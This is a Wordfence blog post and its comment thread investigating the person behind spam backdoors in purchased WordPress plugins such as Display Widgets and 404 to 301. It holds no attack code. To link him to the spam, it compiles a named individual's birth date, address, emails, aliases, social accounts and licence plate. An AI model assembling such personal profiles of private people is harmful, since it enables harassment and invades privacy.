Updates on CyberSecurity, WordPress and what we're cooking in the lab today.

The Man Behind Plugin Spam: Mason Soiza

This entry was posted in General Security, WordPress Security on September 13, 2017 by Mark Maunder   161 Replies

This post is part of a series. This is the second post and a follow-up to our first story titled “Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites“. There is a third post in this series which explains how the same spammer influenced a total of 9 WordPress plugins over a 4.5 year period.

In this post, we explore who is behind the purchase and corruption of the Display Widgets plugin and at least two other popular WordPress plugins.

As part of my research into the sale of the Display Widgets plugin and the subsequent spam that appeared in it, I had reached out to Stephanie Wells, the original author of Display Widgets who sold it. Stephanie got back to me moments after I hit the publish button on our post.

We had a chat on Skype and she was incredibly concerned, helpful and forthcoming with data to try and clear up what exactly happened here. Steph has kindly agreed to let me share the details of their transaction with the WordPress community.

I was really excited because this allowed us to follow the money in our investigation into who is behind the spam in Display Widgets. Little did I know that this would lead to two other plugins and shed light on a story we wrote about last year.

Following The Money

Steph confirmed that they had sold the Display Widgets plugin to “Mason Soiza” for $15,000. He had approached them via their web contact form. This is the original email they received, complete with spelling errors:

–Begin email–

We would like to purchase this plugin from you and take complete owner ship of it and take away the stress from you.

We are trying to build one of the largest wordpress plugin companies and in doing this we are trying to purchase some rather large plugins like yours.

I am wondering if me and my team would be able to purchase this plugin from you and then take over the complete development of it and push out a new update to make it work better with the latest wordpress.

We will also put our admin team onto the support forum and make sure the users are happy and if there are any features they are specifically asking for we will get them added in to the next update.

We have over 34 Plugins that we now own and manage.

–End email–

During their negotiations they received a further email from Soiza on April 24th which read:

–Begin email–

We have 1 plugin per account as WordPress do not really like the fact that people sell or buy the plugins so this protects us as the buyer from one of the previous owners from “snitching” and then crashing all our other plugins.

I can name drop a few however:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.
https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

We have many others but these are most recent.

To be brutally honest,

It helps with our web business that is pretty big in the casino industry, when we can use as a sales tactic “Our code is used on over 30million websites” world wide etc etc. Sounds silly but it goes along way in our industry, especially as we need to evident our statements by law.

–End email–

Notice I’ve marked the “404 to 301” plugin in red. We’ll come back to that.

The plugin was no longer a core part of Steph and her husband’s business, so they decided to sell it.

The paypal transaction from May 19th, 2017 to purchase Display Widgets reads: Mason Soiza (pp@linkrocket.net) made a $15,000.00 USD payment

The contract that Steph received is signed by Mason Soiza.

On June 21st, the first release of Display Widgets under the new author went out. Then on June 30th there was a second release, version 2.6.1, which included the malicious code we covered in part 1 of this series of posts. To remind you, this code allowed the new plugin author – Soiza, in this case – to publish spam content on any site running Display Widgets. There were approximately 200,000 sites using Display Widgets at the time.

The Trac ticket that Calvin Ngan opened 7 weeks ago, which was the first report of the malicious code and activity in Display Widgets, reported Payday Loan spam. This is an important fact, as you’ll see below.

Who Is Mason Soiza?

The contract that Stephanie received is signed by Mason Soiza. The company name used on the contact is:

Soiza Limited of Jubilee Cottage, Nottingham, England, NG122LD.

Companies House in the UK shows Soiza Limited as:

The address is a complete match to the address and company name provided on the invoice. The company has one corporate officer, Mason Reece Soiza, born March 1994 (age 23), a British citizen, appointed to the board on December 6th, 2016. His occupation is listed as Computer Programmer.

The email that Soiza used in the transaction is pp@linkrocket.net. If we visit the site linkrocket.net, it doesn’t provide much other than a logo. However, if we look at an archived version of it from May 2014, three emails appear on the home page, and we get Mason Soiza’s real email address, which is mason@linkrocket.net.

Using an email search engine called Pipl, we searched for mason@linkrocket.net and found a long list of social profiles.

Included is a LinkedIn profile for Mason Soiza in Nottingham. The profile pic has now been removed from his LinkedIn profile page but this is a screen capture.

Soiza’s LinkedIn profile lists him as CEO of “Payday Loans Now” since 2014.

If we visit www.paydayloansnow.co.uk, we discover at the top left of the page the following:

The footer of the page looks like this:

The pertinent data in this footer is:

  • Paydayloansnow.co.uk is confirmed to belong to Soiza Internet Marketers Limited (SIML).
  • SIML is an “introducer appointed representative” of Quint Group Limited.
  • SIML is entered on the Financial Services Register in the UK under reference number 748266
  • Quint Group Limited is entered on the Financial Services Register under reference number 669450
  • SIML’s company number is 09861376

Lets go to the Financial Services Register and look up SIML’s reference number. We find it listed as follows. You can click the image for a larger version which opens in a new tab.

And on the FCA we find the email address mason@inkrocket.net. This may be a typo because the domain ‘inkrocket.net’ doesn’t actually exist. The actual domain should probably be (l)inkrocket.net.

Who Does Soiza Represent?

Based on data from the UK’s Financial Conduct Authority, “Soiza Internet Marketers Limited” is authorized to introduce clients to Quint Group Limited. Quint provides the financial services that Soiza is selling.

Soiza also operates www.unsecuredloans4u.co.uk which is also reselling Quint’s financial products.

I phoned Quint in the UK and was escalated to their compliance director, Graham McGifford, who was very responsive. He told me that Quint does have standards they require their representatives to adhere to and they will take action if needed.

Quint confirmed that Mason Soiza is an authorized representative, or ‘introducer,’ as the FCA’s website calls it.

Graham requested that I send him more information so that they can look into the matter. We will be forwarding this blog post.

Linking Mason Soiza to the 404 to 301 Plugin Spam

You will recall that in Soiza’s own email to Steph (above) which he sent in April of this year while negotiating the purchase of the Display Widgets plugin, he mentioned that he bought the 404 to 301 plugin:

https://en-gb.wordpress.org/plugins/404-to-301/<– bought this a few weeks back still in process of transferring , they have had bad press in the past so we want to fix it and also improve on the current version in terms of “auto 404 fix”.

In August of 2016, we wrote a story titled “404 to 301 Plugin Considered Harmful“. This was a controversial piece and we posted a follow-up titled “We will always put our customers and community first“.

In the follow-up, we mention that the spam from the 404 to 301 plugin was appearing on school websites in the UK and in particular, a UK based “escort” service called cityofescorts.co.uk had appeared on a school website. This is the code that was fetching the spam content for the 404 301 plugin:

And this is an obfuscated screenshot we included in our August 2016 post:

If you do a whois lookup on cityofescorts.co.uk, you discover that the owner is Mason Soiza.

The wpcdn.io server that was being used to serve spam to the “404 to 301” plugin is still up and running today. And if you visit the URL at wpcdn.io that was being used to serve up spam today, it serves up paydayloansnow.co.uk, which we have shown is another Soiza website.

Soiza says he bought 404 to 301. I reached out to the original plugin author, Joel James, to see if that is true. I haven’t been able to contact him.

Back in August of last year, Joel James wrote on this blog:

Did Joel James give Soiza commit access to his code? I would really like to hear more about what exactly happened. Soiza is now saying he purchased the plugin, but we don’t know if that was before or after the 404 to 301 debacle unfolded. Joel if you could comment here to help us understand the timeline, that would be really helpful.

What About the Other Plugins Soiza Bought?

In his email to Steph, Soiza mentions two other plugins. The notes to the right of each arrow are his:

https://wordpress.org/plugins/wp-slimstat/ <– managed by Dino
https://wordpress.org/plugins/finance-calculator-with-application-form/ <– bought 2 days ago as we have a great concept on growing htis and really wanted the name “Finance Calculator” still needs the designer to jump on.

I have not been able to connect with the author of ‘WP Slimstat’.

I did manage to connect with Ciprian Popescu, author if the “Finance Calculator” plugin that Soiza says he purchased and Ciprian was kind enough to share the details with me.

Soiza contacted Ciprian early this year and used an alias of “Kevin Danna”. He expressed interest in buying Finance Calculator.

Soiza then purchased Finance Calculator for $600. During his communication with Ciprian, Mason Soiza appeared to make an error and he accidentally signed one of his emails from the Kevin Danna alias as ‘Mason’. Ciprian shared a screenshot with me:

Soiza also appears to use the Kevin Danna alias on WordPress forums.

Ciprian told me that for some reason, Soiza never updated the plugin after he purchased it. After learning about what happened with Display Widgets, he has taken back control of the Finance Calculator plugin, revoked Soiza’s access and confirmed that it is malware free. I received this message from him:

Hi Mark,

I can confirm that my plugin has not been tampered with. I have pushed an update to remove the ‘financecalculator’ committer, which was Mason Soiza. I am in the process of updating more stuff, such as rewriting some code for a smaller footprint; but the plugin is fully functional and malware-free.

My Communication With Soiza

We now have hard evidence, courtesy of Ciprian, that Soiza uses the “Kevin Danna” email address to communicate with people. We also know that the new owner of Display Widgets plugin was using that address on WordPress forums.

I communicated with “Kevin Danna” via email while researching our previous post. I asked about the “34 plugins” mentioned on the wpdevs.co.uk website that they owned. I also wanted to know if the malicious code in Display Widgets was there intentionally. This is the reply I received from “Kevin”. I published this in our previous post and left out the first few paragraphs. I’m including them this time to give you a sense of who this person is.

Hi Mark,

Just seen this email WOW!

My side of the story is, as you may/may not know. I got diagnosed with Lung Cancer a few months ago, so only have a few months/maybe a year left on this earth. So i sold up all my plugins to numerous people.

The Display Widgets plugin was sold to a company in California who made me sign a NDA. Probably due to the reasons you have highlighted. This is the only plugin i sold to this “guy”. He claims to have lots of “drupal” plugins and this was his first wordpress plugin. I bought this plugin for $15,000 and sold it for $20,000. They told me they was using it to advertise there toolbar, which i suppose you could use to search them up.

In regards to the 34 plugins and counting, that was at the peak of my career. I would buy plugins brand them up towards say a “web design” business on the /wp-admin/ and then sell the web design business along with the plugin with words like “Used by over 100,000+ websites” adding words like that etc inflated the price of the business by xyz and then i would simply flip it as quick as i could. WP Devs is now a defunct company for obvious reasons.

I apologise for any inconvenience i have caused in directly. I wish you the best of luck!.

Thanks

Kevin D

We know that Soiza bought the Display Widgets plugin from Steph and bought Ciprian’s Financial Calculator plugin. We know that Soiza communicates using the Kevin Danna email address. We also know that Mason Soiza owns the domains used for spamming in the “404 to 301” plugin. We also know that Steph sold her plugin for $15,000 to Mason Soiza. The above email is actually the first time I had heard the number mentioned. We also know that the wpdevs.co.uk website was only registered in April, so it’s not an old business from the “peak” of someone’s career.

So I’m going to go out on a limb here and say that Kevin Danna is actually Mason Soiza and based on Soiza’s public Facebook Profile, he is looking quite healthy.

Other Interests

According to a Whoisology search using Soiza’s email address, he owns the following domains:

  • onlineblackjackexpert.net (Active blackjack site)
  • 0xd0d78w2.info (Listed with Google as serving up malware. See below)

Before Google blocked it, the 0xd0d78w2.info domain was serving up a site that claimed your computer was infected and tried to get you to call a “Microsoft” support line. It looked like this (courtesy of Archive.org):

Business Is Good

Soiza appears to live the high life. On his public Facebook profile, he posts that he attended the Monaco Grand Prix in May of this year.

In April he was at Dead Rabbit in New York ($16 a cocktail).

Last year someone with the name “Mason Reece Soiza” posted a photo of their 2012 Ferrari 458 Italia on rate-drive-co.uk. The thread was discussing an “idiot driver” driving a red Ferrari 458 Italia 2012 model. The license plate is “MA52 SON”.

Business appears to be booming for Soiza.

Wrapping It Up

Our team has assembled a lot of data on Mason Soiza from public sources. He has interests in a wide range of online business that include payday loans, gambling and ‘escort’ services, among others.

He has been active on black hat forums and has been banned from “Black Hat World” (username LinkRocket) and from WickedFire.com (username MasonSoiza). Soiza is active on Reddit as IIRR and moderates a a subreddit called /r/paydayloansnowcouk.

At this point we have confirmed that Soiza purchased the Financial Calculator plugin and the Display Widgets plugin and we have established a financial trail. He added a backdoor to the Display Widgets WordPress plugin to allow himself unlimited publishing access to sites running the plugin.

We also know that Soiza was involved in the spam that originated from the “404 to 301” plugin which he says he bought, although in that case the author has not yet confirmed the sale of the plugin. His escort website and payday loans websites were spammed from the “404 to 301” plugin.

If you are contacted by “Kevin Danna” or “Mason Soiza” and are a plugin author, we advise you to avoid all contact.

As always I welcome your feedback in the comments.

Thanks and Credits

A big thanks to Steph Wells, original author of the Display Widgets plugin who provided the initial financial data we needed to follow the money. Also a huge thanks to Ciprian Popescu, author of the Financial Calculator plugin, who also shared transaction data with me and a screenshot that confirmed Soiza uses the Kevin Danna alias. Both plugin authors worked with me on very short notice, so thank you!!

Also a huge thanks to our team who dropped everything and worked to rapidly build up a profile of Soiza. I’ve mentioned their names on the blog before, but just about everyone pitched in on this post, so you can hit our About page to see who they are. Special thanks to Matt Barry who recognized the connection between Soiza and the “404 to 301” plugin during our research.

Did you enjoy this post? Share it!


4.68 (168 votes) Your rating:

161 Comments on "The Man Behind Plugin Spam: Mason Soiza"

Katy Stevens September 13, 2017 at 10:58 am • Reply

You guys do better research than a woman who thinks her man is creeping around on her...! NICE work. Found this a thoroughly interesting read.

TBG Marketing September 13, 2017 at 11:01 am • Reply

Are you saying that wp-slimstat is compromised?

Mark Maunder September 13, 2017 at 11:28 am • Reply

I have no data on that at this time.

James September 13, 2017 at 2:08 pm • Reply

I pinged the developer Jason/Camu/coolmann on slack. I might have insight Mark. Can you email me?

Jeannie September 13, 2017 at 11:08 am • Reply

So does this mean that if we have the 'Display Widgets' plug-in, we are in threat of seeing spam if we upgrade the plug-in?

Thanks

Mark Maunder September 13, 2017 at 11:27 am • Reply

The new version is safe thanks to the plugin repository maintainers.

Geoff Jones September 13, 2017 at 11:09 am • Reply

Nice residence he has too.
[Link to residence removed by moderator]

Amy September 13, 2017 at 11:09 am • Reply

Very thorough write up—thank you. I suspect you will be contacted by more plug-in authors. I appreciate the "abandoned" and "removed" plug-in warnings you've added to WF, by the way.

Kristian September 13, 2017 at 11:11 am • Reply

You guys are fantastic!! Love you extra mile efforts on everything you do. The future is yours.

Vic Vinegar September 13, 2017 at 11:12 am • Reply

jj@linkrocket.net = Joel James?

Mark Maunder September 13, 2017 at 11:56 am • Reply

Just chatted to the team and two analysts involved in the research both have high confidence that is not Joel James.

Joel James September 14, 2017 at 11:59 pm • Reply

Hey Vic,

No. It's not me :)

Zubair Beg September 13, 2017 at 11:12 am • Reply

Wow.. You guys are really Sherlock!
So what can you do now? To stop this guy?

Jeff L. September 13, 2017 at 11:13 am • Reply

Nice work guys! I've been using your plugins since the day you released them, I'm a premium customer now, and I can't tell you how much your work means to the wordpress community - you've really skyrocketed your abilities over the past year or so and I recommend you to each and every person I know that works with wordpress.

Jeff

steelyhead September 13, 2017 at 11:17 am • Reply

This is like a thriller. Nice long read and totally worth It of your time. Am I in the wrong side of the law? I have webpages and my family has been living of what I made from my 9 local pages for many years but I don't have a Ferrari and surely I cannot go to places who charge You $16USD per cocktail. I am just wondering.

Jim D. September 13, 2017 at 11:17 am • Reply

Great detective work, and writing.
So, what are the ramifications/punishment for Mr. Soiza if any?

Gary September 13, 2017 at 11:18 am • Reply

Possibly the most interesting thing I've ever read. Nice job!

Gordon September 13, 2017 at 11:18 am • Reply

So tell me you've sent all this on to the appropriate law channels

eamel September 13, 2017 at 11:18 am • Reply

I feel sorry for Ciprian. He must be pissed he got rid of his Financial plugin for just 600 bucks whilst the Dispaly widget has been sold for $15.000. Poor guy.

Ciprian Popescu September 14, 2017 at 2:55 am • Reply

I do not feel sorry. The plugin didn't have that many active installs at that time compared to Display Widgets.

Ian Goldey September 13, 2017 at 11:20 am • Reply

Great detective work I thoroughly appreciate the diligence in communication as it gives me a better sense of how you help protect end users like myself

Benjamin September 13, 2017 at 11:21 am • Reply

Wow nice work. U guys think he'll get busted for this stuff ?
Im hoping for a nice little police raid in his companys

Kelly September 13, 2017 at 11:21 am • Reply

You guys are awesome! Thanks for looking out for our safety. I truly appreciate each member of your team for the work they do.

Mark Scott September 13, 2017 at 11:22 am • Reply

As Mason Soiza appears to be resident in and operating in the UK, you might want to contact the UK Police fraud action line with the results of your investigation:
http://www.actionfraud.police.uk/

Mark Maunder September 13, 2017 at 11:25 am • Reply

Thanks. We have not contacted law enforcement at this time. We have contacted the financial firm he represents and they have asked for more information.

Nicholas September 13, 2017 at 11:59 am • Reply

You should contact them, or at least someone should.

It also appears he runs an online pharmacy in the UK. I doubt that a person of his character should be issuing prescription drugs to sick people.

Katy September 13, 2017 at 11:04 pm • Reply

HMRC would probably be quite interested too! https://www.gov.uk/government/organisations/hm-revenue-customs/contact/customs-excise-and-vat-fraud-reporting

Stephen Edgar September 14, 2017 at 12:33 am • Reply

This should be reported (along with any unpublished information) to the "UK National Cyber Crime Unit" as noted by a David Sandilands below) .

As noted at the end of your article "...our team who dropped everything and worked to rapidly build up a profile of Soiza.", I'd have much rather have seen you take all the time you needed to work with the authorities to have “Mason Soiza” arrested and prosecuted for his actions rather than being "doxed" here on a blog post.

Once “Mason Soiza” was convicted, documenting that and then publishing that would make for a ripping post.

Instead, I'm disappointed and all I see is “Mason Soiza” has been given a heads up to go hide and from authorities for his crimes.

Mark Maunder September 14, 2017 at 8:16 am • Reply

I think we did a pretty good job of capturing the docs that would be needed to prosecute him. We have a lot that remains unpublished dating back to when he was a teenager. Should Scotland Yard reach out, we'd be happy to work with them.

Mark.

ChrisNJ September 13, 2017 at 11:22 am • Reply

Great work on exposing a scammer. He and other similar low-life's will probably just learn to better cover their tracks in the future, but it is a great case study on what will likely become an increasing problem of shady operators acquiring or adopting legitimate and popular plugins and corrupting them to enable spamming and hacking of WordPress websites. Once again WordFence leads in the arena of cyber security.

Ko September 13, 2017 at 11:24 am • Reply

Quote : We have over 34 Plugins that we now own and manage.
Wich ones ?

Mark Maunder September 13, 2017 at 11:24 am • Reply

I think that is a false claim.

Rich S. September 13, 2017 at 11:25 am • Reply

Nice work, Mark and co.

Mason Soiza is like the villain from a white collar crime drama. Hopefully, your research will make potential victims aware.

Steve September 13, 2017 at 11:25 am • Reply

What an interesting read. You perform incredible research and it's much appreciated.

Mark Maunder September 13, 2017 at 11:27 am • Reply

Thank you. It's a team effort. Usually 5 to 10 people helping out with these posts whether it's research or editing.

Artem Russakovskii September 13, 2017 at 11:26 am • Reply

Nice detective work, Mark.

Mark Maunder September 13, 2017 at 11:26 am • Reply

Thanks.

Lawrence September 13, 2017 at 11:27 am • Reply

Mark, I am so impressed that you have exposed this guy. In a world where people tend to let bad things happen because they don't think it affects them you have become a champion. As has been said throughout history, the only thing necessary for the triumph of evil is that good men do nothing and you are absolutely doing something to protect us!
I have several websites all running the free version of Wordfence. I maintain these for people free of profit and so could not commit to a premium version. However, because I value everything you do I would be happy to make a donation if that is possible. Please let me know.

bruceb September 13, 2017 at 11:27 am • Reply

Awesome detective work guys! I love it. I would rather read these than the local news. :)

Keep up the great work, and thanks for caring so much about the WordPress community.

Doctor Popular September 13, 2017 at 11:32 am • Reply

This was a great read. Can't wait for the film adaptation. Who should play Mason? I could see James Franco pulling it off.

Tracy Abildskov September 13, 2017 at 11:33 am • Reply

WOW what a great article. Thank You. Special Thanks also to Steph Wells & Ciprian Popescu.

Tracy

Ciprian Popescu September 14, 2017 at 2:56 am • Reply

Thank you, Tracy!

Previsha September 13, 2017 at 11:34 am • Reply

Wow, this is impressive research. Thanks for making us aware of the person behind the spam. Spammers beware, Wordfence will find you.

Ken September 13, 2017 at 11:35 am • Reply

Fantastic detective work!!! I'm looking forward to your next takedown!

Simon Leek September 13, 2017 at 11:38 am • Reply

Great read. If Mason thinks he's innocent you should be getting a call from his lawyers sometime soon. But something tells me you won't be getting that call. Let us know if he doesn't get in touch because that will confirm his guilt.

John September 13, 2017 at 11:39 am • Reply

Wanting to be sure it is not the same slimstat plugin I've used on occasion in the past (its not), I went to the url for WP-Slimstat you give... The plugin was updated 17 hours ago, has 100,000+ active installs, a 4.8 review rating with 671 five stars, and 45 out of 45 resolved issues in last two months... The author seems to be unrelated to all of this...?

You don't mention this wp-slimstat but the one time I believe, as one purchased by Soiza...? Maybe some more needs to be said regarding this...? Distance all this from that plugin, if it is unrelated...?

Ovidiu September 13, 2017 at 11:41 am • Reply

Man, WHAT A STORY! I can't believe you really went that far to document this. You really did a great job! Also, this guy seems a bit too "exposed" for what he does, I mean, I would have expected that someone with this kind of "activity" to clean his footprints better, but as you point here, he's, well, almost everywhere with this name in clear. I guess it would come handy for the police :-)

Congratulations!

Paul September 13, 2017 at 11:42 am • Reply

We use SlimStat Analytics. Maybe you should contact the developer Jason Crouse and ask him if everything is ok. Mentioning his plugin and then not adequately checking if it has any relevance to this article is not a good idea.

Mark Maunder September 13, 2017 at 12:01 pm • Reply

I tried but had no luck. Couldn't find contact info anywhere.

Bjarne September 14, 2017 at 7:01 am • Reply

Jason, developer of Slimstat Analytics tells that the plugin never switched hands on https://wordpress.org/support/topic/issues-unrelated/#post-9496649

Also claims to be reaching out to WF without luck - sort of funny in a world more connected than ever ;)

Thank you all for your great work - using both WF and Slimstat on most of my sites :)

Mark Maunder September 14, 2017 at 8:10 am • Reply

He reached out a couple of hours ago. It's 8am here and I'm just starting my day. Have replied to him via email and to the comment here.

WOWW September 13, 2017 at 11:44 am • Reply

This is HUGE!
I was so concentrated and exited while reading this.. same as I was watching the best crime - thriller movie:).
I remember as it was yesterday about "404 to 301 Plugin" and Joel James crying that he made a mistake... This isn't end.. soon I hope we will find the true story about "404 to 301 Plugin" and hopefully more plugins got bought by Mason.
Personal THANKS to plugin authors for the info provided.
GREAT job guys (and girls), waiting for more news!!!

Mark Maunder September 13, 2017 at 12:01 pm • Reply

Thanks. :-)

Adrian September 13, 2017 at 11:44 am • Reply

One thing not clear from this is whether the Display Widgets Plugin is now free of this code or not. I have it on one client's site and it was updated to revert to the previous version 2.05. I then got a notification to update to 2.7 but it will not update to this and when I look at "view details" I see the following error message :-

Warning: call_user_func_array() expects parameter 1 to be a valid callback, function 'dfcg_load_scripts_footer' not found or invalid function name in /home2/don/public_html/wp-includes/class-wp-hook.php on line 298 There is nothing wrong with the WP-Includes code and it does not happen when looking at any other plugin's "view details" so clearly there still appears to be something wrong with the latest update. The prior version 2.05 works.

Mark Maunder September 13, 2017 at 11:59 am • Reply

Hi. The plugin team took it over and it's clean now. Update here: https://wordpress.org/support/topic/display-widgets-2-7-is-safe/

look September 13, 2017 at 11:52 am • Reply

WOW! you are doing a great job! keep it going!

Ammar September 13, 2017 at 11:57 am • Reply

You should contact the police immediately, its a cyber crime. Thank you so much for this valuable information.

Roger Maves September 13, 2017 at 11:58 am • Reply

So what is the best way to protect yourself from plugins like these? Is there a way to check them before installation?

Paul Brady September 13, 2017 at 12:07 pm • Reply

Very well done.

Mark Maunder September 13, 2017 at 12:07 pm • Reply

Wanted to include this here. We didn't include this fact in the post. Soiza targeting Drupal modules in 2014.

https://twitter.com/wordfence/status/908043683269709824

Lisa September 13, 2017 at 12:41 pm • Reply

That makes me wonder if he got his hooks into any Joomla extensions as well. Scary thought.

Jay September 13, 2017 at 12:12 pm • Reply

Keyser Soiza walking with a limp now :D Nice work.

Brom September 13, 2017 at 12:23 pm • Reply

What a great article.
Some of the most enjoyable reading I've had recently.

I scanned his Payday site for plugins and none were found. How did he cloak his plugins?

Brian September 13, 2017 at 12:26 pm • Reply

Don't forget to leave a Facebook message for him and his girl #twats.

Well done Mark for exposing this scammer living off the riches from SPAM.

David Perednia September 13, 2017 at 12:28 pm • Reply

Great sleuthing Mark. A real eye-opener to the underbelly of the cyber world.

Jack Smith September 13, 2017 at 12:31 pm • Reply

This is an outstanding job of sleuthing and informing the public. It does make me stop and wonder though. This process of purchasing a plugin and reworking it to include a backdoor is bothersome. It makes me wonder/be concerned about who is actually behind a 'useful' plugin and what their intentions are. Most people take a plugin generally for granted, and might potentially base their usage on the plugin based on reports from the web. If a party purchases a previously reliable plugin and secretly uses it to implant a bad door. They will pretty much keep this a secret (until they run into the Wordfence detectives! ). This nefarious usage could go on for a good while, until it is discovered, IF it is discovered. I see this as akin to the 'Trojan Horse' used ages ago. If they cannot batter the gates down, they let you opt to bring their weapon into your site, by your own accord.

Kevin Meredith September 13, 2017 at 12:33 pm • Reply

You should option this blog as Movie. Great stuff.

Paul Dahlen September 13, 2017 at 12:33 pm • Reply

Other WordPress 'news' sites can take lessons from this excellent writeup of information that is genuinely important for WordPress owners to know. This is the kind of investigative news I would pay a subscription price to read. There's quite a bit of investigating that needs to be done indeed! Lots of questions being asked that aren't being answered. Thank you for your piece. I'll bet you had fun following the clues! I know I had fun reading this. Thank you for helping our clients and us stay safe!

Jennifer L Metro September 13, 2017 at 12:34 pm • Reply

So lucky to have you guys on my side! Keep up the good work. I put you on every site I create.

John K September 13, 2017 at 12:42 pm • Reply

WordFence is wonderful as-is, but cannot thank you enough for exposing this cybercrook.

Alan September 13, 2017 at 12:43 pm • Reply

Thank you so much for this thorough piece of investigative journalism! We're living in times that a lot of articles online - even from mainstream news sites - don't follow the rules of journalism: fact-checking, following up with sources, and asking for comments from those being written about, etc. so kudos on a job well done to expose the shoddy dealings of this person.

David Finch September 13, 2017 at 12:44 pm • Reply

I do believe this is the same guy who tried to create a company releasing all of WPMU Dev's Plugins for a lower one off price a few months back. He wasn't particularly subtle about it either.

Jessica September 13, 2017 at 1:03 pm • Reply

So is 404 to 301 still compromised?

Mark Maunder September 13, 2017 at 2:15 pm • Reply

Not that I'm aware of.

winston September 13, 2017 at 1:13 pm • Reply

Great work. But shouldn't this be also the job of the wordpress team? Keeping their plugins save from harmfull plugins? Any reactions from their side?

Donal September 13, 2017 at 1:23 pm • Reply

Great research and a very well done. You guys do such a good job keeping all our wp sites safe.

Erin September 13, 2017 at 1:39 pm • Reply

Wow! Amazing story! You guys are awesome, as always! I am so grateful for the work you do, and for going the extra mile in cybersecurity! I don't know of any company like yours who takes a genuine interest in protecting others or who goes to such extraordinary lengths to do such thorough investigations. You are earning ironclad trust with your customers!!! Thank you so very much for all that you do and keep up the EXCELLENT WORK! Truly jaw-dropping...

David Sandilands September 13, 2017 at 1:42 pm • Reply

This should definitely be reported to the UK National Cyber Crime Unit.

Furthermore, checkout

Mason Reece Soiza is director of 2 companies, RocketX Ltd (Advertising agencies) and TwoNerds Ltd (Publishing of computer games)

Sources :
https://beta.companieshouse.gov.uk/company/10905364/officers
https://beta.companieshouse.gov.uk/company/10823032/officers

There was a company called SOIZA STUDIOS LTD, which was dissolved this year
Source: https://beta.companieshouse.gov.uk/company/06941254

website is/was soizastudios,com who own
onlinecasinoexperts.net and onlinerouletteexpert.net

Good Luck!

StanG September 13, 2017 at 1:44 pm • Reply

Very nice detective work!
Really interesting to read.

Joshua September 13, 2017 at 1:55 pm • Reply

Thank you so much for this. Your in-depth information is amazing!

Steven Wolock September 13, 2017 at 2:04 pm • Reply

Excellent digging and reporting! Thank you!

Sven Schneider September 13, 2017 at 2:34 pm • Reply

wow, best story ever! I really appreciate your efforts doxing that person. Hope he doesn't get away with this ...

H Per September 13, 2017 at 2:42 pm • Reply

Awesome! Thanks so much for this! Luck!

Steven September 13, 2017 at 2:45 pm • Reply

Thank you for this info, it is so deep and never imagine this kind of thing is happened. anyway wordfence help me to protect my website from hackers, I setup auto block user to sign in using invalid username and most of them from Rusia. I am still using the free version as I can't afford to upgrade.
Thank you.

Glenn Ferrell September 13, 2017 at 2:50 pm • Reply

Wow! If there were an annual "Cuckoo's Egg" award, I would hope you're up for it :) This trail seems to lead to someone UK authorities might like to meet.

Mark Maunder September 13, 2017 at 3:54 pm • Reply

Thanks Glenn!!

Elizabeth September 13, 2017 at 2:53 pm • Reply

Great job! When does the movie come out?

Mark Maunder September 13, 2017 at 3:53 pm • Reply

Haha. Thanks Elizabeth.

kerri@kerrimarvelservices.com September 13, 2017 at 4:28 pm • Reply

Out of morbid curiosity, I tried to look at his facebook link - he (or facebook) has already taken it down! No other facebook pages with his name. Doesn't appear he has a fb page under Kevin Danna either.

Trevor September 13, 2017 at 4:41 pm • Reply

Looks like he's already deleted his Facebook profile. But his Reddit activity does confirm that he's also selling pharmaceuticals.

Neil September 13, 2017 at 5:00 pm • Reply

What an incredible story! Well done Wordfence team, this reads like a thriller and is excellent journalism - despite that not *really* being what you do. Who knew that spam actually pays too?

More importantly this is important information for the WordPress community - both developers and users. You have done a great job in uncovering an important issue.

Ron September 13, 2017 at 5:18 pm • Reply

Wow nice detective work digging into this.
I see his FB is gone. Twitter and YouTube both empty now too.

Luke September 13, 2017 at 6:30 pm • Reply

Well done !
Congratulations!

BigAl September 13, 2017 at 6:43 pm • Reply

Note to self: do not EVER get on the bad side of Mark Maunder.

Mason Wheeler September 13, 2017 at 7:18 pm • Reply

Wow, this guy really annoys me for some reason... :P

Seriously, though, I agree with the others saying you should turn him over to the police. Good riddance to bad trash.

william mccauley September 13, 2017 at 7:44 pm • Reply

Thank you for your research.
It appears he is running in some ways. We'll have to watch for activity
as I get a sense that he doesn't care what damage is left behind.
The character does not seem to be smart enough to run a business.
It appears to be a sham.
Wordfence provides a tremendous service.

Philip Franckel September 13, 2017 at 8:41 pm • Reply

Very impressive investigative work. I'm sending your article to a friend of mine who owns an international investigative agency. I think he'll be impressed too.

Jane September 13, 2017 at 9:28 pm • Reply

$15k for that plugin??? am I missing something here....

anyway great job as he must have made a ton off my sites alone as I use/used all of the ones he exploited..

Ben September 13, 2017 at 10:20 pm • Reply

This seems to just be a symptom of a bigger issue of poor policies on the part of WordPress.org that probably goes beyond just Mason Soiza.

The details for the majority of plugins don't list who the current maintainer is or when it changes hands. The changelog for the plugin does not give any indication of it every having been taken down for violation of WordPress policies. The plugin retained it 90% five-star review status with no indication any bad behavior ever having been discovered between June through September.

So, given how little WordPress did for months to encourage community involvement to self-police known bad behavior of the plugin, I find it really troubling the attitude being dished out by Jan Dembowski at https://blog.dembowski.net/

In a blog post titled "WordPress Is About Responsibility," he seems to blame WordPress users for not being responsible enough and excuse WP support forum administrators since they are merely unpaid volunteers. He provides as "solutions" that there is WP Site Care and WordPress Meetups, but he provides no proof that involving either of those would have caught the malicious behavior. Again, while WP was aware enough of something violating the rules to have taken the plugin down back on June 22nd, there is no indication of that in the changelog. In fact, rather than state that download of 38MB of PHP code from an external site was the problem, the changelog contains a willfully misleading claim the issue was about downloading 50MB of data from MaxMind. So, what would have alerted WP Site Care or a WordPress Meetup member that the plugin needed a re-review since it otherwise held a perfect track record up to then?

